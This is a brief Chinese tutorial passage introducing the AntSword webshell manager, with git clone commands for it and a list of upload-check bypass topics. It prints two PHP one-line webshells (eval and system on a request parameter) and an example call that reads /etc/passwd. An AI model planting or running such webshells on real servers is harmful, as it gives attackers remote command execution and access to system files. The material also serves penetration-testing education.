中国蚁剑的使用
本来想使用中国菜刀来演示WebShell的使用的,但中国菜刀太老了且不开源,还爆出过各种后门,所以笔者比较有阴影,这里我就使用中国蚁剑,中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员,其使用方法和菜刀差不多而且跨平台。
蚁剑的安装需要下载两个文件,分别是加载器和源码,如下代码托管在了GitHub上:
> git clone https://github.com/AntSwordProject/antSword.git > git clone https://github.com/AntSwordProject/AntSword-Loader.git
下载好以后点击加载器中的 AntSword.exe 程序然后选择antSword源代码,程序就可以正常工作了,接下来我们就来看下常用的WebShell小马的写法。
# eval 使用PHP系统函数 <?php eval($_REQUEST['cmd']); ?> 调用方式:http://lyshark.com/shell.php?cmd=phpinfo();
# system 使用系统命令 <?php system($_REQUEST['cmd']); ?> http://lyshark.com/shell.php?cmd=cat /etc/passwd
2.客户端检测的绕过
3.服务端检测黑名单
4.服务端检测白名单
5.MIME验证的绕过
6.目录验证的绕过